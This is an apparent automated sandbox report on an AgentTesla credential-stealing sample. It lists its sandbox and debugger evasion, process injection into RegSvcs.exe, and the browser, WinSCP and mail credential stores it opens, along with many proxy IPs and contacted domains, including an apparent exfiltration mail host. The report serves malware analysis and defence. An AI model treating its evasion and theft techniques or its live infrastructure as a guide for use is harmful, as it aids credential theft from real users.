                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98031Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97921Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97808Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97692Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97437Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97309Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97179Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96798Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96682Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96557Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95100Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94981Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94875Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94766Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94656Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94547Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94437Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94328Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94219Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94094Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 93969Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 93859Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 93748Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 93641Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 93516Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 93390Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 93277Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 93172Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 92985Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 92859Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 92743Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 92640Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 92531Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 92422Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: RegSvcs.exe, 00000004.00000002.2764598895.0000000002C71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD2A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
                      Source: RegSvcs.exe, 00000004.00000002.2757087631.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: vmware
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD2A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD2A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD2A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                      Source: RegSvcs.exe, 00000004.00000002.2757087631.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1794947481.00000194C4616000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD2A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD2A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD2A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD2A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD2A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD2A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                      Source: RegSvcs.exe, 00000004.00000002.2791833489.00000000060A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

                      Anti Debugging

                      barindex
                      Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FD70A8 CheckRemoteDebuggerPresent,4_2_00FD70A8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      .NET source code references suspicious native API functions
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, DecodeLastFromUtf8AllFlags.csReference to suspicious API methods: RuntimeHelpers.GetObjectValue(VirtualProtect(PublicPropertiesThreadPoolWorkerThreadStop, Action10FileAttributeTagInformation, getIsJITOptimizerDisabledBleUn, out EndOfStringgetIndent))
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, DecodeLastFromUtf8AllFlags.csReference to suspicious API methods: RuntimeHelpers.GetObjectValue(GetProcAddress((IntPtr)getParameterValueX86Base, RevokeObjectBoundCustomFormatClass))
                      Source: 0.2.SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe.194d832d050.0.raw.unpack, xUX1WKw.csReference to suspicious API methods: yoi2Sa2W.OpenProcess(oywUbCp0l62.DuplicateHandle, bInheritHandle: true, (uint)hdq2Ex2.ProcessID)
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                      Writes to foreign memory regions
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43E000Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 440000Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: B67008Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exeJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe.194d94271b0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe.194d94271b0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe.194d832d050.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe.194d832d050.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.2757087631.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2764598895.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2049795050.00000194D9427000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2764598895.0000000002C9E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2764598895.0000000002CA4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2049795050.00000194D80E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe PID: 5828, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 22352, type: MEMORYSTR
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe.194d94271b0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe.194d94271b0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe.194d832d050.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe.194d832d050.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.2757087631.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2764598895.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2049795050.00000194D9427000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2049795050.00000194D80E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe PID: 5828, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 22352, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe.194d94271b0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe.194d94271b0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe.194d832d050.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe.194d832d050.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.2757087631.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2764598895.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2049795050.00000194D9427000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2764598895.0000000002C9E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2764598895.0000000002CA4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2049795050.00000194D80E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe PID: 5828, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 22352, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		1
                      Disable or Modify Tools                      		1
                      OS Credential Dumping                      		1
                      File and Directory Discovery                      		Remote Services11
                      Archive Collected Data                      		3
                      Ingress Tool Transfer                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Native API                      		Boot or Logon Initialization Scripts211
                      Process Injection                      		1
                      Deobfuscate/Decode Files or Information                      		1
                      Input Capture                      		24
                      System Information Discovery                      		Remote Desktop Protocol1
                      Data from Local System                      		11
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts2
                      Command and Scripting Interpreter                      		Logon Script (Windows)Logon Script (Windows)1
                      Timestomp                      		1
                      Credentials in Registry                      		1
                      Query Registry                      		SMB/Windows Admin Shares1
                      Email Collection                      		11
                      Non-Standard Port                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                      DLL Side-Loading                      		NTDS521
                      Security Software Discovery                      		Distributed Component Object Model1
                      Input Capture                      		3
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Masquerading                      		LSA Secrets251
                      Virtualization/Sandbox Evasion                      		SSHKeylogging14
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts251
                      Virtualization/Sandbox Evasion                      		Cached Domain Credentials1
                      Application Window Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items211
                      Process Injection                      		DCSync1
                      System Network Configuration Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe11%ReversingLabsWin64.Trojan.Generic
                      SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe32%VirustotalBrowse
                      SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      SourceDetectionScannerLabelLink
                      ktxcomay.com.vn0%VirustotalBrowse
                      windowsupdatebg.s.llnwi.net0%VirustotalBrowse
                      heygirlisheeverythingyouwantedinaman.com21%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_0%URL Reputationsafe
                      http://183.89.45.167:8080://proxy0%Avira URL Cloudsafe
                      http://185.89.181.212:56780%Avira URL Cloudsafe
                      http://154.202.118.127:3128://proxy0%Avira URL Cloudsafe
                      http://188.164.196.31:494260%Avira URL Cloudsafe
                      http://38.242.136.254:19700%Avira URL Cloudsafe
                      http://5.252.23.220:31280%Avira URL Cloudsafe
                      http://167.99.219.173:8118://proxy0%Avira URL Cloudsafe
                      http://176.113.73.99:31280%Avira URL Cloudsafe
                      http://183.89.45.167:8080://proxy0%VirustotalBrowse
                      http://185.89.181.212:56782%VirustotalBrowse
                      http://38.242.136.254:19703%VirustotalBrowse
                      http://176.113.73.99:31281%VirustotalBrowse
                      http://104.21.6.88:800%Avira URL Cloudsafe
                      http://5.252.23.220:31282%VirustotalBrowse
                      http://38.7.1.233:9990%Avira URL Cloudsafe
                      http://188.164.193.178:307440%Avira URL Cloudsafe
                      http://111.224.213.165:8089://proxy0%Avira URL Cloudsafe
                      http://188.164.196.31:494262%VirustotalBrowse
                      http://104.21.6.88:800%VirustotalBrowse
                      http://167.99.219.173:8118://proxy0%VirustotalBrowse
                      http://188.164.193.178:3074411%VirustotalBrowse
                      http://192.248.166.13:88880%Avira URL Cloudsafe
                      http://3.27.109.94:56781://proxy0%Avira URL Cloudsafe
                      http://147.45.40.15:30463://proxy0%Avira URL Cloudsafe
                      http://172.67.255.224://proxy0%Avira URL Cloudsafe
                      http://38.7.1.233:9990%VirustotalBrowse
                      http://178.212.48.80:80800%Avira URL Cloudsafe
                      http://51.77.65.164:319790%Avira URL Cloudsafe
                      http://41.65.251.85:1981://proxy0%Avira URL Cloudsafe
                      http://192.248.166.13:88881%VirustotalBrowse
                      http://107.180.95.177:63951://proxy0%Avira URL Cloudsafe
                      http://178.212.48.80:80802%VirustotalBrowse
                      http://46.101.19.131://proxy0%Avira URL Cloudsafe
                      http://3.27.109.94:56781://proxy1%VirustotalBrowse
                      http://103.28.121.58:3128://proxy0%Avira URL Cloudsafe
                      http://184.178.172.25:152910%Avira URL Cloudsafe
                      http://41.65.251.85:1981://proxy1%VirustotalBrowse
                      http://50.169.135.10:800%Avira URL Cloudsafe
                      http://36.95.155.74:3126://proxy0%Avira URL Cloudsafe
                      http://50.169.135.10:803%VirustotalBrowse
                      http://51.77.65.164:319792%VirustotalBrowse
                      http://36.95.155.74:3126://proxy3%VirustotalBrowse
                      http://103.28.121.58:3128://proxy2%VirustotalBrowse
                      http://200.108.234.105:8080://proxy1%VirustotalBrowse
                      http://107.180.95.177:63951://proxy3%VirustotalBrowse
                      http://184.178.172.25:152917%VirustotalBrowse
                      http://200.108.234.105:8080://proxy0%Avira URL Cloudsafe
                      http://185.161.186.82:54321://proxy0%Avira URL Cloudsafe
                      http://192.140.42.83:31511100%Avira URL Cloudmalware
                      http://201.77.108.64:9990%Avira URL Cloudsafe
                      http://178.49.14.57:3128://proxy0%Avira URL Cloudsafe
                      http://190.14.215.130:8080://proxy0%Avira URL Cloudsafe
                      http://162.19.7.61:37013://proxy0%Avira URL Cloudsafe
                      http://161.97.170.209:13636://proxy0%Avira URL Cloudsafe
                      http://36.92.111.49:52471://proxy0%Avira URL Cloudsafe
                      http://201.77.108.64:9991%VirustotalBrowse
                      http://192.140.42.83:315118%VirustotalBrowse
                      http://189.29.143.202:4153://proxy0%Avira URL Cloudsafe
                      http://178.49.14.57:3128://proxy1%VirustotalBrowse
                      http://190.14.215.130:8080://proxy2%VirustotalBrowse
                      http://196.216.13.36:56780%Avira URL Cloudsafe
                      http://45.117.179.179:331640%Avira URL Cloudsafe
                      http://161.97.170.209:13636://proxy7%VirustotalBrowse
                      http://154.12.253.232:251580%Avira URL Cloudsafe
                      http://185.161.186.82:54321://proxy1%VirustotalBrowse
                      http://102.216.69.176:8080://proxy0%Avira URL Cloudsafe
                      http://36.92.111.49:52471://proxy2%VirustotalBrowse
                      http://64.202.186.2:42160%Avira URL Cloudsafe
                      http://196.216.13.36:56782%VirustotalBrowse
                      http://72.10.160.90:152650%Avira URL Cloudsafe
                      http://150.230.207.167:800%Avira URL Cloudsafe
                      http://192.169.244.80:41568://proxy0%Avira URL Cloudsafe
                      http://31.22.7.188:56981://proxy0%Avira URL Cloudsafe
                      http://162.0.220.234:8776://proxy0%Avira URL Cloudsafe
                      http://168.205.102.26:8080://proxy0%Avira URL Cloudsafe
                      http://103.141.109.143:8181://proxy0%Avira URL Cloudsafe
                      http://54.38.179.203:350320%Avira URL Cloudsafe
                      http://178.79.165.164:550140%Avira URL Cloudsafe
                      http://91.134.140.160:27207://proxy0%Avira URL Cloudsafe
                      http://190.242.126.170:9990%Avira URL Cloudsafe
                      http://72.10.160.170:5385://proxy0%Avira URL Cloudsafe
                      http://172.233.146.207:31280%Avira URL Cloudsafe
                      http://117.54.114.101://proxy0%Avira URL Cloudsafe
                      http://190.120.254.233:9990%Avira URL Cloudsafe
                      http://202.12.80.11:830%Avira URL Cloudsafe
                      http://41.242.69.196:5678://proxy0%Avira URL Cloudsafe
                      http://149.202.172.1130%Avira URL Cloudsafe
                      http://203.110.145.82:631280%Avira URL Cloudsafe
                      http://149.28.141.180:652010%Avira URL Cloudsafe
                      http://103.113.71.230:10800%Avira URL Cloudsafe
                      http://152.32.132.220://proxy0%Avira URL Cloudsafe
                      http://162.214.163.137:7070://proxy0%Avira URL Cloudsafe
                      http://188.166.252.135:8080://proxy0%Avira URL Cloudsafe
                      http://51.210.45.148:38650%Avira URL Cloudsafe
                      http://46.21.153.16:3128://proxy0%Avira URL Cloudsafe
                      http://31.43.52.176:41890://proxy0%Avira URL Cloudsafe
                      http://103.216.51.36:326500%Avira URL Cloudsafe
                      http://149.126.101.162:8080://proxy0%Avira URL Cloudsafe
                      http://179.57.172.172:9990%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      ktxcomay.com.vn
                      		222.255.238.159
                      		truefalseunknown
                      mail.supplyvan.xyz
                      		199.188.206.65
                      		truetrue
                        		unknown
                        github.com
                        		140.82.113.4
                        		truefalse
                          		high
